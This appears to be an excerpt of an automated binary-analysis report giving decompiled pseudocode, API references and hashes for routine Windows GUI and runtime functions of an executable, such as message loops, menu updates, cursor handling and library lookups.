						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x492ba8 = 0;
					} else {
						 *0x492ba8 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x492b8c; // 0x0
				 *0x492bac =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x492bac;
				if( *0x492bac != 0) {
					_t37 =  *0x492b9c; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x492bac; // 0x0
					E0043DA18(_t39, _t38, _t85, _t37);
				}
				_t35 = E004035AC(1);
				 *0x492bb4 = _t35;
				if( *0x492ba8 != 0) {
					_t35 = E00433A84(0x492b98, 1);
				}
				return _t35;
			}

APIs

GetCursorPos.USER32(00492B98), ref: 00433D75
GetCursor.USER32(00492B98), ref: 00433D91

Part of subcall function 00432F94: SetCapture.USER32(00000000,?,00433DA5,00492B98), ref: 00432FA3

GetDesktopWindow.USER32 ref: 00433E83

Strings

-C, xrefs: 00433E9C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow
String ID: -C
API String ID: 669539147-734977625
Opcode ID: ca48cc84ca0dd6cc0cf6e9fb9e9006a99ceffaa155bb66273fd42df2dea659f8
Instruction ID: 2eaacaf76be489e86d716aee7ead0c638bf8eedc68e3a9194ff12353d0ce47fc
Opcode Fuzzy Hash: ca48cc84ca0dd6cc0cf6e9fb9e9006a99ceffaa155bb66273fd42df2dea659f8
Instruction Fuzzy Hash: 3F417C74604200AFC308DF2DEA45616BBE1AB98315F25857FE4498B3A2DBB5E841CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00455C78, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00455C78(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t51;
				void* _t55;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x455d86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t55 = E00455BF4(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t51 = _v8;
					_t79 =  *((intOrPtr*)(_t51 + 0x48));
					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
						E004561CC(_v8);
					}
				}
				E00453D80(_t55,  &_v20);
				E00432CEC(_v20, 0,  &_v16, _t79);
				_t36 =  *0x492c04; // 0x2210d40
				E00455E34(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x455d2f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0xea)) != 0) {
					 *((intOrPtr*)(_v8 + 0xe8))();
				}
				if(_v9 != 0) {
					E00455B90();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x491298; // 0x492030
				if(_t41 ==  *_t67 && E0041C04C() != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00455D8D);
				return E0040436C( &_v20, 2);
			}

APIs

Part of subcall function 00455BF4: GetCursorPos.USER32 ref: 00455BFD

GetCurrentThreadId.KERNEL32 ref: 00455D44
WaitMessage.USER32(00000000,00455D86,?,?,?,dZG), ref: 00455D66

Strings

dZG, xrefs: 00455C7E
0 I, xrefs: 00455D49

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorMessageThreadWait
String ID: 0 I$dZG
API String ID: 535285469-2938273626
Opcode ID: 3d681111c8618528a4e1041365c9b9f13b08f4b4b6371d64dceb3201248204a9
Instruction ID: aee61bb921914333cf1fbbfcb3916a5d260a496205d63880cac9e805c0785e19
Opcode Fuzzy Hash: 3d681111c8618528a4e1041365c9b9f13b08f4b4b6371d64dceb3201248204a9
Instruction Fuzzy Hash: D131B330A04648EFDB11DFA4D856BAEB7F5EB05304F5184BAEC00A7392D7786E48CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00469248, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00469248(void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				void* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;

				_t51 = _t52;
				_t53 = _t52 + 0xffffffec;
				_v8 = 0;
				_push(_t51);
				_push(0x469320);
				_push( *[fs:eax]);
				 *[fs:eax] = _t53;
				if( *0x492c98 != 0) {
					L6:
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(0x469327);
					return E00404348( &_v8);
				} else {
					E004043E0( &_v8, "comctl32.dll");
					_push( &_v12);
					_t24 = E004047F8(_v8);
					_t49 = _t24;
					_push(_t49);
					L00406AAC();
					_t40 = _t24;
					if(_t40 == 0) {
						goto L6;
					} else {
						_v16 = E00402754(_t40);
						_push(_t51);
						_push(0x4692fd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t53;
						_push(_v16);
						_push(_t40);
						_t29 = _v12;
						_push(_t29);
						_push(_t49);
						L00406AA4();
						if(_t29 != 0) {
							_push( &_v24);
							_push( &_v20);
							_push("\\");
							_t35 = _v16;
							_push(_t35);
							L00406AB4();
							if(_t35 != 0) {
								 *0x492c98 =  *((intOrPtr*)(_v20 + 8));
							}
						}
						_pop(_t47);
						 *[fs:eax] = _t47;
						_push(0x469304);
						return E00402774(_v16);
					}
				}
			}

APIs

739414E0.VERSION(00000000,?,00000000,00469320), ref: 0046928C
739414C0.VERSION(00000000,?,00000000,?,00000000,004692FD,?,00000000,?,00000000,00469320), ref: 004692B9
73941500.VERSION(?,00469348,?,?,00000000,?,00000000,?,00000000,004692FD,?,00000000,?,00000000,00469320), ref: 004692D3

Strings

comctl32.dll, xrefs: 00469273

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 739414$73941500
String ID: comctl32.dll
API String ID: 1696551078-431930879
Opcode ID: 65552d942158ec9e7681598cbdf27608651cc30ca3f9d374b749fa70c811db1d
Instruction ID: d40dff72efb8d8445c623cb3f32c012382b88a02f6904c72aaf35b00b2720eb8
Opcode Fuzzy Hash: 65552d942158ec9e7681598cbdf27608651cc30ca3f9d374b749fa70c811db1d
Instruction Fuzzy Hash: 95213D75600208AFDB01EFA5CD919AE73ECEB49300B524476F900E3691E7B89E40CA69

Uniqueness

Uniqueness Score: -1.00%

Function 0045533C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0045533C(void* __eax, char* __ecx, struct tagMSG* __edx) {
				int _t21;
				MSG* _t30;
				void* _t31;
				char* _t32;

				_t22 = __ecx;
				_push(__ecx);
				_t30 = __edx;
				_t31 = __eax;
				_t21 = 0;
				if(PeekMessageA(__edx, 0, 0, 0, 1) != 0) {
					_t21 = 1;
					if(_t30->message == 0x12) {
						 *((char*)(_t31 + 0x9c)) = 1;
					} else {
						 *_t32 = 0;
						if( *((short*)(_t31 + 0xd2)) != 0) {
							_t22 = _t32;
							 *((intOrPtr*)(_t31 + 0xd0))();
						}
						if(E0045529C(_t31, _t30) == 0 &&  *_t32 == 0 && E004551A8(_t31, _t30) == 0 && E004551E4(_t31, _t22, _t30) == 0 && E00455184(_t31, _t30) == 0) {
							TranslateMessage(_t30);
							DispatchMessageA(_t30);
						}
					}
				}
				return _t21;
			}

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0045534F
TranslateMessage.USER32 ref: 004553B9
DispatchMessageA.USER32 ref: 004553BF

Strings

dZG, xrefs: 0045533C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekTranslate
String ID: dZG
API String ID: 4217535847-410245891
Opcode ID: 52db6a5178ac992f7f48b92b63478e97822c7f46f14c61a044fb709eb9ff9181
Instruction ID: 7fd86baadd6340566fa38400ec47d4f9bb55de5063f691e291ee64f212a7f120
Opcode Fuzzy Hash: 52db6a5178ac992f7f48b92b63478e97822c7f46f14c61a044fb709eb9ff9181
Instruction Fuzzy Hash: 9901D220704F4056EA31222A581277F9BA54FD178AF14486FFC89A7383DBEC9C5E426A

Uniqueness

Uniqueness Score: -1.00%

Function 00448AB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00448AB0(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x49129c; // 0x4927f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00448E34(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00448E34(_t29) & 0x0000007f) << 0x0000000d) + ((E00448E34(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}

APIs

GetMenuItemInfoA.USER32 ref: 00448AFE
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448B50
DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448B5D

Strings

P, xrefs: 00448AF0

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: ba6573d917332b9c0be5651dfed5df7281952947ac75fbf58c9735fc59c8b2b7
Instruction ID: cfe592187995a5c8c27ed1b21ffff70120c866184a2454854dd83d498c80581e
Opcode Fuzzy Hash: ba6573d917332b9c0be5651dfed5df7281952947ac75fbf58c9735fc59c8b2b7
Instruction Fuzzy Hash: DE119D70605200AFE3109F28CC81B5A7AD4EB84358F14866EF098DB3D5CA79DC85C64A

Uniqueness

Uniqueness Score: -1.00%

Function 004264A8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004264A8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x426571);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x492a2c =  *0x492a2c + 1;
				if( *0x492a2c == 0) {
					_t3 =  *0x492a84; // 0x22106d0
					E004035DC(_t3);
					_t5 =  *0x476784; // 0x0
					E004035DC(_t5);
					_t7 =  *0x476780; // 0x0
					E004035DC(_t7);
					E004234DC(__ebx, _t27);
					_t10 =  *0x476788; // 0x22106f4
					E004035DC(_t10);
					_t12 =  *0x492a80; // 0x2210730
					E004035DC(_t12);
					_t14 =  *0x492a74; // 0x2210658
					E004035DC(_t14);
					_t16 =  *0x492a78; // 0x2210680
					E004035DC(_t16);
					_t18 =  *0x492a7c; // 0x22106a8
					E004035DC(_t18);
					_t20 =  *0x492a28; // 0xc40806be
					DeleteObject(_t20);
					_push(0x492a44);
					L004068A4();
					_push(0x492a5c);
					L004068A4();
					_t34 =  *0x412b34; // 0x412b38
					E00404E28(0x4766a0, 0x12, _t34);
					_t35 =  *0x412b34; // 0x412b38
					E00404E28(0x476518, 0x31, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x426578);
				return 0;
			}

APIs

DeleteObject.GDI32(C40806BE), ref: 00426520
RtlDeleteCriticalSection.KERNEL32(00492A44,C40806BE,00000000,00426571), ref: 0042652A
RtlDeleteCriticalSection.KERNEL32(00492A5C,00492A44,C40806BE,00000000,00426571), ref: 00426534

Strings

8+A, xrefs: 00426543, 00426558

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete$CriticalSection$Object
String ID: 8+A
API String ID: 378701848-2727534933
Opcode ID: f015d21b22477912e6f5e73b3d2f447c5391d7f240376e9a0d997c50e50c4408
Instruction ID: 202c77e7a0c7c83f8ca4daaa98a883a19753f7ddcfdda9886c7b9d40ed037a6c
Opcode Fuzzy Hash: f015d21b22477912e6f5e73b3d2f447c5391d7f240376e9a0d997c50e50c4408
Instruction Fuzzy Hash: A50109723005047FD625BF26EE429193BA9EB44309392443BB408A76B2CABCED52CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0042742C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042742C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x492ac7 != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x492aa8; // 0x42742c
					 *0x492aa8 = E00427194(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x492aa8(_a4, _a8, _t19);
				}
				return _t16;
			}

0x00427432
0x0042743c
0x00427466
0x0042746f
0x00427497
0x00427497
0x00427471
0x00427471
0x00427476
0x00000000
0x00000000
0x00427476
0x0042743e
0x00427443
0x00427450
0x00427462
0x00427462
0x004274a2

APIs

GetSystemMetrics.USER32 ref: 0042747A
GetSystemMetrics.USER32 ref: 0042748C

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

,tB, xrefs: 00427443, 00427450, 0042745C
MonitorFromPoint, xrefs: 0042743E

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: ,tB$MonitorFromPoint
API String ID: 1792783759-1712981672
Opcode ID: d1eaed9f57635eedea0ffe6d8fe66eb31ee7e96fde009f1834cff5b44424e2e1
Instruction ID: fd0bdc76ba2c9c772aa9b2bc5317b54d86d60807665b21432e5bed67e800e2ef
Opcode Fuzzy Hash: d1eaed9f57635eedea0ffe6d8fe66eb31ee7e96fde009f1834cff5b44424e2e1
Instruction Fuzzy Hash: 1D016732305224FFDB10AF55ED44B5A7F56EB54764F908037F90487652C3B89D4187AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3F4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3F4() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x4760e4 = _t1;
				}
				if( *0x4760e4 == 0) {
					 *0x4760e4 = E00408B60;
					return E00408B60;
				}
				return _t1;
			}

0x0040b3fa
0x0040b3ff
0x0040b403
0x0040b40b
0x0040b410
0x0040b410
0x0040b41c
0x0040b423
0x00000000
0x0040b423
0x0040b429

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C0CD,00000000,0040C0E0), ref: 0040B3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B40B

Strings

GetDiskFreeSpaceExA, xrefs: 0040B405
kernel32.dll, xrefs: 0040B3F5

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: c56ea8fbd26fb46fb1fc0b81d0cb4dff8a382f1104e53f3b639e698f0638967a
Instruction ID: d3bd04d6302a56580ccfc2d28a3835f024593f99f405b7cd70c95abbfcc9cd06
Opcode Fuzzy Hash: c56ea8fbd26fb46fb1fc0b81d0cb4dff8a382f1104e53f3b639e698f0638967a
Instruction Fuzzy Hash: A3D05EB0A017514AD700FBB159D17662595C750704F41843BB106752C3D77C8998439C

Uniqueness

Uniqueness Score: -1.00%

Function 00426980, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00426980() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				if( *0x492a94 == 0) {
					_t1 = GetModuleHandleA("comctl32.dll");
					 *0x492a94 = _t1;
					if( *0x492a94 != 0) {
						_t2 =  *0x492a94; // 0x0
						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
						 *0x492a98 = _t3;
						return _t3;
					}
				}
				return _t1;
			}

0x00426987
0x0042698e
0x00426993
0x0042699f
0x004269a6
0x004269ac
0x004269b1
0x00000000
0x004269b1
0x0042699f
0x004269b6

APIs

GetModuleHandleA.KERNEL32(comctl32.dll,004269F1,00000200,0046920A), ref: 0042698E
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004269AC

Strings

InitCommonControlsEx, xrefs: 004269A1
comctl32.dll, xrefs: 00426989

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: InitCommonControlsEx$comctl32.dll
API String ID: 1646373207-802336580
Opcode ID: b4e1c1f1a313d6417313857fdb522ebdf0dc22661366f020aa2a879659217c54
Instruction ID: 4117415445c2b2d2fd07e8e7d79381c66bde265d186aac133dcfd91a3ead421d
Opcode Fuzzy Hash: b4e1c1f1a313d6417313857fdb522ebdf0dc22661366f020aa2a879659217c54
Instruction Fuzzy Hash: 69D09EF6A01232EAE734EFA6BB4671537945724745F52043BA04956AB5CAFC14C8C70C

Uniqueness

Uniqueness Score: -1.00%

Function 00463630, Relevance: 6.2, APIs: 4, Instructions: 225
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00463630(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00460DC4( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041FBEC( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E00420284( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E00463198( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E00420600( *((intOrPtr*)( *_t212 + 0x208)));
					E0041FBEC( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E00420284( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E00420540(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041FBEC( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041F400( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E0046179C(_v36);
					_v38 = E00460EB0(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043C1F4( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E00420704( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00463810))) {
							case 0:
								E00463208(_t213);
								goto L22;
							case 1:
								__eax = E00463414(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E00463364(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E00463258(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E004634C4(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E0046354C(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x463920; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043C1F4( *_t212);
					_t153 = GetFocus();
